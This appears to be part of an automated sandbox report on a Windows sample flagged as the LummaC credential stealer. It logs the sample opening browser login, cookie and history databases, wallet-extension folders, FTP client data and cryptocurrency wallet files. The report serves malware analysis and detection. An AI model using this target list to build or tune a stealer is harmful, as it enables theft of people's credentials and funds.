Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\MQAWXUYAIK	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\MQAWXUYAIK	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe

Directory queried: number of queries: 1001

Yara detected Credential Stealer

Source: Yara match	File source: 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: jSFUzuYPG9.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
